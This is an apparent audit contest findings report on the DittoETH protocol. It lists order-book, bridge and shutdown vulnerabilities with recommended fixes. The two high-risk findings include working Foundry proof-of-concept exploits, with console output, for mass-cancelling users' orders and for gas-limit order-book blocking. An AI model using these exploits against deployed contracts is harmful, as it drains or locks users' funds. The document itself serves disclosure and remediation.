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DittoETH - Findings Report

Table of contents

Contest Summary

Sponsor: Ditto

Dates: Sep 8th, 2023 - Oct 9th, 2023

See more contest details here

Results Summary

Number of findings:

  • High: 2
  • Medium: 4
  • Low: 2

High Risk Findings

H-01. Users Lose Funds and Market Functionality Breaks When Market Reachs 65k Id

Relevant GitHub Links


if the orderbook of any market reach 65,000 dao can call the function cancelOrderFarFromOracle multiple times to cancel many orders up to 1000 order in each transaction ,or anyone can cancle the last order in one call.the users who issued the canclled orders will lost thier deposits.and the canclled process is not limited to a certain orders numbers.

Vulnerability Details

source : contracts/facets/OrderFacet.sol
Function : cancelOrderFarFromOracle

  • when ever a user create a limit order (short limit,bid limit,ask limit), if the order did not match it get added to the orderbook, and the assets amount or eth amount uses to create this order is taken from the Virtual balance of the user in the system .
    userVault(in case of bids and shorts) or userAsset(in case of asks) we can see that here :

  •       // for asks:
          s.assetUser[asset][order.addr].ercEscrowed -= order.ercAmount;
          // for shorts :
          s.vaultUser[vault][order.addr].ethEscrowed -= eth;
          //for bids :
          s.vaultUser[vault][order.addr].ethEscrowed -= eth;

    also if there is no id's Recycled behind the Head the id for this orders gonna be the current id in s.asset[asset].orderId,and the s.asset[asset].orderId get increamented by one . this is true for all three types of orders. (shorts,asks,bids).

    • now in case this ordersId reach 65k for a specific market, the DAO are able to cancle the last 1000 order, and any one can cancle last order in one call. since it's only checks for the ordersId > 65000.and by the last order i mean the last order of any time of limit orders (asks,shorts,bids).

      function cancelOrderFarFromOracle(address asset, O orderType, uint16 lastOrderId, uint16 numOrdersToCancel)
          if (s.asset[asset].orderId < 65000) {
              revert Errors.OrderIdCountTooLow();
          if (numOrdersToCancel > 1000) {
              revert Errors.CannotCancelMoreThan1000Orders();
          if (msg.sender == LibDiamond.diamondStorage().contractOwner) {
              if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {
                  s.bids.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);
              } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {
                  s.asks.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);
              } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {
                  s.shorts.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);
              } else {
                  revert Errors.NotLastOrder();
          } else {
              //@dev if address is not DAO, you can only cancel last order of a side
              if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {
                  s.bids.cancelOrder(asset, lastOrderId);
              } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {
                  s.asks.cancelOrder(asset, lastOrderId);
              } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {
                  s.shorts.cancelOrder(asset, lastOrderId);
              } else {
                  revert Errors.NotLastOrder();
      ... ....
      // cancle many orders no extra checks  :
      function cancelManyOrders(
          mapping(address => mapping(uint16 => STypes.Order)) storage orders,
          address asset,
          uint16 lastOrderId,
          uint16 numOrdersToCancel
       ) internal {
          uint16 prevId;
          uint16 currentId = lastOrderId;
          for (uint8 i; i < numOrdersToCancel;) {
              prevId = orders[asset][currentId].prevId;
              LibOrders.cancelOrder(orders, asset, currentId);
              currentId = prevId;
              unchecked {
      ...... .....
      // no extrac checks in  cancleOrder() function also. it set the order to Cancelled , remove it from the list, and Set it to be reused:
      function cancelOrder(mapping(address => mapping(uint16 => STypes.Order)) storage orders, address asset, uint16 id)
          uint16 prevHEAD = orders[asset][Constants.HEAD].prevId;
          // remove the links of ID in the market
          // @dev (ID) is exiting, [ID] is inserted
          // BEFORE: PREV <-> (ID) <-> NEXT
          // AFTER : PREV <----------> NEXT
          orders[asset][orders[asset][id].nextId].prevId = orders[asset][id].prevId;
          orders[asset][orders[asset][id].prevId].nextId = orders[asset][id].nextId;
          // create the links using the other side of the HEAD
          emit Events.CancelOrder(asset, id, orders[asset][id].orderType);
          _reuseOrderIds(orders, asset, id, prevHEAD, O.Cancelled);
  • as we said the user balance get decreaced by the value of it's order he created. but since the order is set to cancelled the user never gonna be able to recieve thier amount back.cause cancelled orders can't be matched Neither cancelled again.

    • Ex:
    • a user create a limit bid as follow : {price: 0.0001 ether, amount: 10000 ether}.
    • when this order get cancelled : the user will loose : 0.0001 * 10000 = 1 ether ZETH (or ETH)

      the shorters will lose more then others since thier balance get decreaced by : PRICE * AMOUNT * MARGIN.

  • The second issue is there is no limit for how many orders can be cancelled. you can cancel the whole orders in a market that reaches 65K orderId. limits shorts ,limits asks or limit bids .starting from the last one.since the only Conditionto be able to cancel orders is the asset order ID reached this number. and if it reachs it. it never decrease .even if there is alot of orders behind head(non active) to be reused.

  • a malicious actor Can targeted this vulnerability by creating numerous tiny limit asks pushing the orderId to be too high .and he can do so by creating ask with a very high price and very small amount so he can pass the MinEth amount check, he can just with less then 1 cusd (in case of cusd market) create a bunsh of limit asks orders .


  • using the the main repo setup for testing , here a poc shows how a malicious user can fill the orderbook with bunsh of tiny limit asks with little cost. and how you can cancle all orders in case the orderId reachs 65k. also that there is no refund for the users that created this orders.
// SPDX-License-Identifier: GPL-3.0-only
pragma solidity 0.8.21;

import {Errors} from "contracts/libraries/Errors.sol";
import {Events} from "contracts/libraries/Events.sol";
import {STypes, MTypes, O} from "contracts/libraries/DataTypes.sol";
import {Constants} from "contracts/libraries/Constants.sol";
import "forge-std/console.sol";
import {OBFixture} from "test/utils/OBFixture.sol";
// import {console} from "contracts/libraries/console.sol";

contract POC is OBFixture {
   address[3] private bidders = [address(435433), address(423432523), address(522366)];
   address[3] private shorters = [address(243422243242), address(52353646324532), address(40099)];
    address attacker = address(3234);
   function setUp() public override {

       // an attacker can fill the order book with a bunsh of asks that have too high price and low asset 
   function test_fillWithAsks() public {
    // create a bunsh of asks with a high price :
    depositUsd(attacker, DEFAULT_AMOUNT * 10000);
    uint balanceAssetBefore = diamond.getAssetBalance(asset,attacker);
        // minAsk = 0.0001 ether . 0.0001 ether = x * 1 , x =0.0001 ether * 1 ether
        for (uint i ; i< 1000 ;i++){
           createLimitAsk(  10**24, 10**10); 
        STypes.Order[] memory asks = diamond.getAsks(asset);
        console.log("tiny asks created : ", asks.length);
        console.log( "hack cost asset", balanceAssetBefore - diamond.getAssetBalance(asset,attacker));

   function test_cancleOrders() public {
       //set the assetid to 60000;
       // create multiple bids and 1 shorts
       fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, bidders[0]); // id 64998
       fundLimitShortOpt(uint80(DEFAULT_PRICE)*4, DEFAULT_AMOUNT, shorters[0]); //id 64999
       fundLimitBidOpt(DEFAULT_PRICE*2, DEFAULT_AMOUNT, bidders[1]); // id 65000
       fundLimitBidOpt(DEFAULT_PRICE*3 , DEFAULT_AMOUNT, bidders[2]); //id 65001
       /* now we have the lists like this :
        - for bids : Head <- Head <->65001<->65000<->64998->Tail
        - for shorts: Head <- Head <->64999->Tail

       //lets cancle the all the bids :
       //  - now : Head <-64998<-> Head <->65001<->65000->Tail
       uint s1 = vm.snapshot();
       // - now : Head <-64998<->65000<-> Head <->65001->Tail
       uint s2 = vm.snapshot();
       // - now : Head <-64998<->65000<->65001<-> Head ->Tail
       // let's check the  active bids :
       STypes.Order[] memory Afterbids = diamond.getBids(asset);
       // notice that we were able to delete all the bids even there was unActive ID's to be reused.
       assertTrue(Afterbids.length == 0);
       // also notice that the owners of this orders did not get refund thier zeth back that have been taken from them when they create this orders.

       for (uint i; i<bidders.length;i++){
        // check that there is no refund for the users : 
           uint ethUser = diamond.getZethBalance(vault,bidders[i]);
           console.log('balance of : ', bidders[i],ethUser);
           assertEq(ethUser ,0);
       // also we can cancle the shorts and the asks, i don't wanna make POC to long , but this is the can cancle all the orders of a market if this market reach 65000,
       diamond.cancelOrderFarFromOracle(asset, O.LimitShort, 64999, 1);

   function canclebid(uint16 id) public {
       diamond.cancelOrderFarFromOracle(asset, O.LimitBid, id, 1);


  • console after running test :
    [PASS] test_cancleOrders() (gas: 1218326)
  balance of :  0x000000000000000000000000000000000006A4E9 0
  balance of :  0x00000000000000000000000000000000193d114b 0
  balance of :  0x000000000000000000000000000000000007f87E 0

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 222.12ms

Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)
  • for creating bunsh of tiny asks :
[PASS] test_fillWithAsks() (gas: 860940067)
  tiny asks created :  1000
  hack cost asset 10000000000000 (which is less then 1 cusd) 

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 7.17s
Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)

impact :

  1. users will lose thier zeth or Erc pagged asset dependens on the order type .
  2. any type of orders in this market (shorts,asks,bids) can be effected and cancelled even if there is a lot of non active ids to be reused.
  3. the whole orders in a market can be canncelled without refunding the orders creators.

tools used :

manual review

Recommendations :

before cancling the orders , check that there is no orders to be reuse or the diffrence between the current orderId (s.asset[asset].orderId) , and the orders to be reused (behind the Head) of this market are Greater then 65000.

// sudo code recommand , but it's really depends on the team how to handle that:
 if (s.asset[asset].OrderId) - (shorts.unActiveIds + asks.unActiveIds + bids.unActiveIds) < 65k revert.

H-02. Gas Limit Exploitation and Order Book Blockage Due to High-Priced Bids

Relevant GitHub Links


  • In scenarios where there are no existing asks or shorts in a specific market order book, a malicious user can disrupt the market. By flooding the market with numerous small bids at an exceptionally high price, this will lead to : prevent new limit asks or limit shorts from being created below their bid price(which too high) cause the matching algorithm will reach the gasLimit matching a bunsh of small bids with the incoming sell order.also No bids below his price will get matched. and the liquidation process in primaryMarginCall will not be possible for short records.

Vulnerability Details:

The vulnerability arises cause the way how matching algorithm in function sellMatchAlgo in the LibOrders.sol library matches incoming ask with the highest bid. Here's how the problem unfolds:

  1. Matching Algorithm Flaw:

    • when a new ask is created,it's get created in the AskOrdersFacet in function createAsk triggering the sellMatchAlgo() function.
    function createAsk(
         address asset,
         uint80 price,
         uint88 ercAmount,
         bool isMarketOrder,
         MTypes.OrderHint[] calldata orderHintArray
     ) external isNotFrozen(asset) onlyValidAsset(asset) nonReentrant {
         uint256 eth = price.mul(ercAmount);
         uint256 minAskEth = LibAsset.minAskEth(asset);
         if (eth < minAskEth) revert Errors.OrderUnderMinimumSize();
         LibOrders.sellMatchAlgo(asset, incomingAsk, orderHintArray, minAskEth);//@audit ..
    • If the ask price is less than or equal to the highest bid price and the ask amount is less than the highest bid amount, the ask matches with the bid and doesn't get added to the order book.
    • The highest bid matched stays as the highest bid in the bids list with less amount .

      bidOrder.amount = StartingAmount - MatchedAmount.
      and the bidder will get his erc tokens in thier virtual balance in the system. as we see in this snippet code :

    // when the  : amount  ask < amount bid
     else {
          //update the erc amount of the highest bid ,by sub the ask amount erc
         s.bids[asset][].ercAmount = highestBid.ercAmount - incomingAsk.ercAmount;
         updateBidOrdersOnMatch(s.bids, asset,, false);
        incomingAsk.ercAmount = 0; // set ask ercAmount to zero.
        matchIncomingSell(asset, incomingAsk, matchTotal);
    // match highest bid when amount ask < amount bid :
    function matchHighestBid(STypes.Order memory incomingSell,STypes.Order memory highestBid,address asset,
        MTypes.Match memory matchTotal
    ) internal {
        s.assetUser[asset][highestBid.addr].ercEscrowed += fillErc;
  2. Exploitable Scenario:

    • The vulnerability emerges when there are no existing asks or shorts in the order book. (or even if there is but the attacker should buy them all).
    • A malicious user can exploit this by :
    1. creating a bid with an exorbitantly high price. Then, they create an ask with the same price but slightly less in amount (e.g., 10 wei lower). This left a tiny highest bid in the order book.

    2. The user then create another bid with a slightly higher price than the existing highest bid (1wei). and another ask that matches with this new highest bid but left a tiny amount again. now E.g. we have :

      Bids Price Bids Amounts
      1 100
      2 340
      100 0.001
      100.01 0.001
  3. repeating this process in a loop. This results in bunsh of tiny bids with disproportionately high prices in the order book.

  4. Gas Limit and Reversion:

    • When a new regular ask is created with a standard price, due to the existence of these numerous tiny high-priced bids, the matching algorithm starts looping through all these bids to match the incoming ask.

    • However, because there are many tiny bids, the transaction reaches the gas limit before the entire ask amount is matched. This premature termination of the transaction leads to a revert,

    • NOTICE that the askers can't create an ask that have tiny amount with the same price of the bidder to match with a Reasonable number of bids that not gonna reach the gas limit . that's because there is a minAmountEth which is :

      price * amount > mintEth

      assume the following :

      • the Malicious user create 1000 bid. the highest bid is :
        {price : 1 ether + 1000 wei , amount : 10 wei}
        the price in each previous bid is 1 wei less . so the first bid is :
        {price : 1 ether , amount : 10 wei}
      • now let's calculate the minimum amount of erc tokens (pagged asset) that an asker can create ask with it at the highest price (1 ether for each asset which too high).
      • assume MinEth is : 0.001 ether
        . we have :
        • MinEth = Price * ErcAmount
        • ErcAmount = MinEth / price
          so the min erc amount at the price the malicious user set as the highest bid will be :
          ercAmount = 0.001 ether * 1 ether / 1 ether = 1000000000000 wei.
    • However, the sum of all the malicious bid amounts from highest to lowest is: 1000 × 10 = 10000 wei. Even if an ask attempts to match the highest bid price, the ask still needs to have a large amount, leading to looping through all these tiny bids. This looping process causes the transaction to reach the gas limit, resulting in a premature termination of the transaction.

  • The same is applicable for shorts limits.
  • for bidders there is no incentive to create a bid that's higher than this price.(which toooo high)
  • the attack will not cost the malicious user too much , since he is matching with it self. the eth amount will cost him for the example provided around : 10000 weiand gas fee.
  • by doing this an attacker can set above the highest bid price,an ask order with with slitlly higher price but with a larger amount that he buy before . forcing the shorters to buy at his price to close thier debt. or just lose thier collateral in case of secondary call for example.


  • using the same repo setup for testing,this is the POC .
pragma solidity 0.8.21;

import {Errors} from "contracts/libraries/Errors.sol";
import {Events} from "contracts/libraries/Events.sol";
import {STypes, MTypes, O} from "contracts/libraries/DataTypes.sol";
import {Constants} from "contracts/libraries/Constants.sol";
import "forge-std/console.sol";
import {OBFixture} from "test/utils/OBFixture.sol";
// import {console} from "contracts/libraries/console.sol";

contract POC is OBFixture {
    address[3] private users = [address(435433), address(423432523), address(522366)];
    address attacker = address(424234234232342);
    function setUp() public override {
        // first create some pagged assets by matching shorts with bids 
        fundLimitBidOpt(DEFAULT_PRICE*3, DEFAULT_AMOUNT * 100, users[0]); 
        fundLimitBidOpt(DEFAULT_PRICE * 2, DEFAULT_AMOUNT * 50, users[0]); 
        fundLimitShortOpt(uint80(DEFAULT_PRICE), DEFAULT_AMOUNT*150, users[0]);
        // give the attacker some assets : 
        depositEth(attacker,DEFAULT_AMOUNT * 100);
        depositUsd(attacker, DEFAULT_AMOUNT * 1000);
    function attacker_setup() public { 
        // check his balance before the bunsh of bids he will create : 
        uint  balanceZethBefore = diamond.getZethBalance(vault,attacker);
        uint balanceAssetBefore = diamond.getAssetBalance(asset,attacker);
        uint16 id;
        uint80 latestPrice;
        for (uint i;i<5000;i++){ 
            if(i == 0){
                latestPrice = DEFAULT_PRICE *50;
            // fundLimitBidOpt(latestPrice , DEFAULT_AMOUNT ,attacker);
            createLimitBid(latestPrice, DEFAULT_AMOUNT);
            // get highest bid : 
            (, id) = diamond.getBidKey(asset,1);
             latestPrice = diamond.getBidOrder(asset,id).price;
            //  console.log(latestPrice);
            // create ask with same price , and amount less 1 wei: 
            createLimitAsk( latestPrice, DEFAULT_AMOUNT - 80);

            latestPrice += 1;//2wei;
        STypes.Order[] memory bids = diamond.getBids(asset);
        console.log( "hack cost zeth",  balanceZethBefore - diamond.getZethBalance(vault,attacker));
        console.log( "hack cost asset", balanceAssetBefore - diamond.getAssetBalance(asset,attacker));
        console.log("bids that attacker create :",bids.length);
       console.log("amount in each bid ",bids[4].ercAmount);


    function test_reachGasLimit() public {
         uint before = gasleft();
        fundLimitAskOpt(DEFAULT_PRICE*3, DEFAULT_AMOUNT, users[0]); 
        uint afterr = gasleft();
        console.log("gasUsed" , before - afterr);

  • console after running test :
 Compiler run successful!

Running 1 test for test/poc.sol:POC
[PASS] test_reachGasLimit() (gas: 723550417)
  hack cost zeth 9999
  hack cost asset 0
  bids that attacker create : 5000
  amount in each bid  80
  gasUsed 35013047

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.50s
Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)


1 . shorters can't close thier position: the shorters will be at risk to not be able to close thier debt position . only if they buy the ercAsset above the price the attacker set. which likelly will be the attacker ask. 2. Limited Order Creation: Users are restricted from creating asks (both limit and market) and setting shorts limits below the price set by the attacker. This restriction significantly hampers market activities since there's no incentive for legitimate bidders to buy the pegged asset at an inflated price.

  1. Blocked Order Book Functionality: Bids placed below the attacker's price will never match with any asks, effectively blocking the entire order book from functioning below the attacker's specified price. This obstruction disrupts the natural trading process and prevents legitimate buyers and sellers from interacting in the market.

  2. Impaired Liquidation Process: The primary liquidation mechanism becomes impractical because it relies on creating a forceBid, which behaves like a regular bid order. However, these force bids, similar to other bids, won't match due to the artificially inflated price. Consequently, the primary liquidation process is rendered ineffective, preventing the clearing of outstanding positions and increasing the risk of market instability.

  3. users who tried to create an ask or short limit. will pay a high gas fee . and the transaction will revert at the end.

Tool used

Manual Review


I would recommend Adding a limit orders to match in the algorithm. that not exceed the block limit gas.

Medium Risk Findings

M-01. ZETH protocol derivative assumes a ~1=1 peg of stETH to ETH

Relevant GitHub Links

Vulnerability Details

  • The protocol implements the ETH derivative for the Lido protocol. The stETH token is the liquid representation of the ETH staked in this protocol.
  • the BridgeSteth contrat is assuming a peg of 1 ETH ~= 1 stETH.
function deposit(address from, uint256 amount) external onlyDiamond returns (uint256) {
        // Transfer stETH to this bridge contract
        // @dev stETH uses OZ ERC-20, don't need to check success bool
        steth.transferFrom(from, address(this), amount);
        return amount;
  • Even though both tokens have a tendency to keep the peg, this hasn't been always the case as it can be seen in this dashboard. There have been many episodes of market volatility that affected the price of stETH, notably the one in last June when stETH traded at ~0.93 ETH.

  • a user can deposit stETH to the system and get a virtual balance of ZETH Derivative that stands for ETH by approving stETH to the bridge contract. then calling the function deposit() from BridgeRouterFacet.

function deposit(address bridge, uint88 amount) external nonReentrant onlyValidBridge(bridge) {
        if (amount < Constants.MIN_DEPOSIT) revert Errors.UnderMinimumDeposit();
        // @dev amount after deposit might be less, if bridge takes a fee

        uint88 zethAmount = uint88(IBridge(bridge).deposit(msg.sender, amount)); // @dev(safe-cast)

        uint256 vault;
        if (bridge == rethBridge || bridge == stethBridge) {
            vault = Vault.CARBON;
        } else {
            vault = s.bridge[bridge].vault;

        maybeUpdateYield(vault, zethAmount);
        emit Events.Deposit(bridge, msg.sender, zethAmount);
  • the user passes the bridge address. which in this case BridgeSteth and the amount wanna deposit.
  • this function calls the bridge that the user provided and the bridge get the tokens from the user. and return the amount getted from the user.
  • then The protocol increases the virtual balance of the user in the system by the same amount of stETH the user deposited . in the function addZeth from LibVault.
    function addZeth(uint256 vault, uint88 amount) internal {
        AppStorage storage s = appStorage();
        s.vaultUser[vault][msg.sender].ethEscrowed += amount;
        s.vault[vault].zethTotal += amount;
  • the user then can withdraw this Zeth virtuals balance through any bridge in this vault. and in our case we have two bridges in this vault. the RethBridge and stETHBridge.
  • no the vulnerability arises when for example as we said the price of stETH is less than ETH then a malicious user can create a massive profit from that. by depositing stETH and withdrawing REth through RethBridge. since the protocole don't Differentiate between the two since they are in the same vault you can deposits with any bridge and withdraw with any bridge you want.


The protocol's vulnerability allows malicious users to exploit price disparities between stETH and ETH. By depositing undervalued stETH and withdrawing overvalued Reth through different bridges within the same vault, these users can generate substantial profits, posing a significant financial risk to the protocol.

Tools Used

manual review

M-02. TAPP Mismanagement: Unfair Asset Treatment and Trust Erosion

Relevant GitHub Links


  • The TAPP (Treasury Asset Protection Pool) mechanism, designed to safeguard market stability during price shocks, has been observed to operate counter to its intended purpose. Specifically, during market shutdowns triggered by undercollateralization, the TAPP seizes remaining collateral above 1:1 ratio , leaving users with pegged assets at a loss often cause TAPP claims collateral before users can redeem their assets, resulting in reduced values during high volatility events.Additionally there is no try to refund when Ratio is under 1:1. leaving the users to take the loss.

Vulnerability Details

  • the protocol claims that the TAPP(Treasury Asset Protection Pool) Used to back under collateralized markets in case of black Swans,and Protecting Ditto users who are holding the pegged assets from loss.

The Treasury Asset Protection Pool (TAPP) is used for bolstering the stability of market pegged assets during periods of large price shock movements....

  • however that's not true in case of market shutdown,in fact the oposit is true .
  • in case of a market became under collateralized anyone can call shutdownMarket function from MarketShutdownFacet facet and close this market.
   function shutdownMarket(address asset) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {
        uint256 cRatio = _getAssetCollateralRatio(asset);
        if (cRatio > LibAsset.minimumCR(asset)) {
            revert Errors.SufficientCollateral();
        } else {
            STypes.Asset storage Asset = s.asset[asset];
            uint256 vault = Asset.vault;
            uint88 assetZethCollateral = Asset.zethCollateral;
            s.vault[vault].zethCollateral -= assetZethCollateral;
            Asset.frozen = F.Permanent;
            if (cRatio > 1 ether) {
                // More than enough collateral to redeem ERC 1:1, send extras to TAPP
                //@audit-issue : the tap should only take the remaining eth , after the users get claimed thier, not before.
                uint88 excessZeth = assetZethCollateral - assetZethCollateral.divU88(cRatio);
                s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;
                // Reduces c-ratio to 1
                Asset.zethCollateral -= excessZeth;
        emit Events.ShutdownMarket(asset);
  • as we can see the The market will close under the minimum ratio .however the minimum ratio it doesn't mean Necessarily 1:1.
  • we see if the market is above 1 ratio .the TAPP will take the remaine collateral and let's this market with 1:1 ratio.
if (cRatio > 1 ether) {
                // More than enough collateral to redeem ERC 1:1, send extras to TAPP
  • Then any user who hold the ERC pegged assets can redeem his eth. here :
 function redeemErc(address asset, uint88 amtWallet, uint88 amtEscrow)
        if (amtWallet > 0) {

        if (amtEscrow > 0) {
            s.assetUser[asset][msg.sender].ercEscrowed -= amtEscrow;

        uint88 amtErc = amtWallet + amtEscrow;
        uint256 cRatio = _getAssetCollateralRatio(asset);
        // Discount redemption when asset is undercollateralized
        uint88 amtZeth = amtErc.mulU88(LibOracle.getPrice(asset)).mulU88(cRatio);
        s.vaultUser[s.asset[asset].vault][msg.sender].ethEscrowed += amtZeth;
        emit Events.RedeemErc(asset, msg.sender, amtWallet, amtEscrow);
  • Notice that the users will get less value. then thier ERC pagged asset value if ration is CR < 1.and in market shutdown events, where the TAPP enforces a 1:1 collateral ratio first, frequently occur during periods of high market volatility. In such situations, users experience amplified losses as the TAPP claims remaining assets about a 1:1 ratio, while the collaterall price continues to crash.

  • also Notice That In the event of a market becoming undercollateralized, the TAPP does not intervene to refund or stabilize the market. Instead, it allows users to suffer losses without attempting to mitigate or share the burden, contrary to its claimed purpose.

  • so TAPP behaves inversely: users face losses while the protocol benefits, contrary to what should occur in such situations.

  • Furthermore, honest shorters with Healthy shortRecords and high C-ratios will face substantial losses. They are unfairly penalized for the unhealthy shortRecords, resulting in the loss of their positions and collateral holdings.

Tools Used

Manual review.


I would recommend :

  • set a claim period for users holding asset to redeem thier eth :
  • if CR < 1 . try to refund the market from the TAPP balance if it's posssible.
  • after the Claim Ends or there is no left Debt(you can track this by decreasing the debt from Asset each time a user redeemed). if there is a remaining collateral add it to the TAPP balance. which would be more Efficient for protocol and users.

M-03. Possible Dos On Withdraws from Reth Bridge

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summary :

  • The RocketPool rETH tokens deposit delay, can prevent Ditto protocol users from withdrawing RETH or unstaking for ETH if others have recently staked. Future changes to this delay could lead to a denial-of-service attack, rendering the unstaking mechanism unusable. Malicious actors could exploit this to block all withdrawal attempts, causing significant disruptions in user transactions and functionality.

Vulnerability Details:

  • RocketPool rETH tokens have a deposit delay that prevents any user who has recently deposited to transfer or burn tokens. In the past this delay was set to 5760 blocks mined (aprox. 19h, considering one block per 12s). This delay can prevent Ditto protocol users from withdrawing RETH or unstaking ETH if another user staked recently through RethBridge.

  • While it's not currently possible due to RocketPool's configuration, any future changes made to this delay by the admins could potentially lead to a denial-of-service attack on the withdraw() and unstakeEth() functions through RethBridge contract. which is a major functionality of the protocol.

  • Currently, the delay is set to zero, but if RocketPool admins decide to change this value in the future, it could cause issues. Specifically, protocol users deposit actions could prevent other users from withdrawing .

  • Given that many users depositting throughout the day, the delay would constantly reset, making the withdrawing mechanism unusable.

  • A malicious actor can also exploit this to be able to block all withdraws calls. Consider the following scenario where the delay was raised again to 5760 blocks. malicious call depositEth(address bridge) from diamond passing RETH bridge.with the minimum amount, consequently triggering deposit to RocketPool and resetting the deposit delay. Alice tries to unstake her funds, but during rETH burn, it fails due to the delay check, reverting the withdraw call.

  • If Bob manages to repeatedly deposit() the minimum amount every 19h (or any other interval less then the deposit delay), all future calls to withdraw will revert.

Recommends :

  • as an option,consider modifying Reth derivative to obtain rETH only through the UniswapV3 pool(E.I) when users deposit eth, on average users will get less rETH due to the slippage, but will avoid any future issues with the deposit delay mechanism.

M-04. there is now withdraw mechanism for ETH in bridge contracts

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  • The bridge contracts Reth and Steth lack a mechanism for withdrawing Ethereum (ETH), posing a risk of permanent loss for any ETH sent to these contracts. These contracts are used in conjunction with staking ETH protocols like RocketPool and Lido.

Vulnerability Details

The vulnerability arises due to the absence of a withdraw function or any method to retrieve ETH from the Reth and Steth bridge contracts. The contracts deals with staking eth protocols Rocket pool and Lido,and have a receive() function. but do not provide a means to access ETH stored within them. Since these contracts are not upgradeable and Separate from the diamond, any ETH in them get lost forever. also the stucked eth can't be staked to Benefit the system since the staking process depends on msg.value only :

  // from Reth bridge :
  function depositEth() external payable onlyDiamond returns (uint256) {
        IRocketDepositPool rocketDepositPool =
        IRocketTokenRETH rocketETHToken = _getRethContract();

        uint256 originalBalance = rocketETHToken.balanceOf(address(this));
        rocketDepositPool.deposit{value: msg.value}();
        uint256 netBalance = rocketETHToken.balanceOf(address(this)) - originalBalance;
        if (netBalance == 0) revert NetBalanceZero();

        return rocketETHToken.getEthValue(netBalance);
  // from Steth bridge :
  function depositEth() external payable onlyDiamond returns (uint256) {
        uint256 originalBalance = steth.balanceOf(address(this));
        // @edv address(0) means no fee taken by the referring protocol
        steth.submit{value: msg.value}(address(0));
        uint256 netBalance = steth.balanceOf(address(this)) - originalBalance;
        if (netBalance == 0) revert NetBalanceZero();
        return netBalance;


  • the native token eth in the bridge contracts BridgeReth BridgeSteth will be lost for ever.

Tools Used

Manual review


add a withdraw function that controlled by the DAO , or insure that the contract don't have any remaining eth in the deposit , and unstake process.

Low Risk Findings

L-01. Incorrect emmited event

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The _createBid function in the BidOrdersFacet contract often emits the wrong bid id or even Emit the Event CreateBid while no bid was created in case of marketOrder.

Vulnerability Details

Within the _createBid function, the emitted id for a bid is determined by s.asset[asset].orderId. However, this value is not always accurate due to its dependency on various limits such as shorts_limits, asks_limits, and bids_limits. Consequently, the emitted id may not align with the actual bid created, leading to discrepancies between the emitted event and the recorded bid. and In numerous cases, the bid does not get created at all, making the emitted event erroneous and misleading.

Here's the relevant code snippet illustrating the issue:

STypes.Order memory incomingBid;
incomingBid.addr = sender;
incomingBid.price = price;
incomingBid.ercAmount = ercAmount; = Asset.orderId; // Incorrectly emits this id, leading to discrepancies
incomingBid.orderType = isMarketOrder ? O.MarketBid : O.LimitBid;
incomingBid.creationTime = LibOrders.getOffsetTime();
MTypes.BidMatchAlgo memory b;
b.oraclePrice = LibOracle.getPrice(asset);
b.askId = s.asks[asset][Constants.HEAD].nextId;
b.shortHintId = b.shortId = Asset.startingShortId;
// emit the asset.orderId regardless of potential modifications or non-creation of the bid
emit Events.CreateBid(asset, sender,, incomingBid.creationTime);
  • In essence, the function emits the asset.orderId regardless of whether the order will be modified due to inactive orders or if the bid won't be created at all, especially in the case of market orders.

L-02. can be delete a bridge that holds some collateral

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summary :

  • In the ownerFacet contract's deleteBridge function, the DAO has the ability to delete a bridge that holds collateral (e.g., reth or steth bridges) without checking if the bridge contains any value. This presents a potential risk, as bridges with collateral should not be deleted inadvertently.

Vulnerability Details:

  • The vulnerability lies in the ownerFacet contract's deleteBridge function. This function allows the DAO to delete bridge contracts without verifying whether the bridge contains any collateral (e.g., assets like reth or steth). The existing function lacks a check to ensure that bridges being deleted hold valuable assets before allowing their deletion.
function deleteBridge(address bridge) external onlyDAO {
   uint256 vault = s.bridge[bridge].vault;
   if (vault == 0) revert Errors.InvalidBridge();

   // ...

   delete s.bridge[bridge];
   emit Events.DeleteBridge(bridge);

impact :

  1. The inaccurate deletion of bridge contracts can significantly impact the calculation of the yield rate within the system. Erroneously deleted bridges may lead to incorrect yield rate calculations, affecting the overall financial stability and investment decisions of users.

  2. Users withdrawing assets from the system will receive diminished value due to the loss incurred from bridges without collateral. The financial loss caused by these deletions will be spread across all users, leading to reduced withdrawal values for everyone participating in the system.

  3. The system is at risk of losing its real collateral, potentially leading to undercollateralization. Bridges without proper collateral may weaken the system's ability to cover outstanding liabilities


enhance the deleteBridge() function by incorporating a collateral check.

function deleteBridge(address bridge) external onlyDAO {
    uint256 vault = s.bridge[bridge].vault;
    if (vault == 0) revert Errors.InvalidBridge();

    // Ensure the bridge not holds collateral before deletion.
    if (IBridge(bridge).getZethValue() > 0) revert ;

    // ...

    delete s.bridge[bridge];
    emit Events.DeleteBridge(bridge);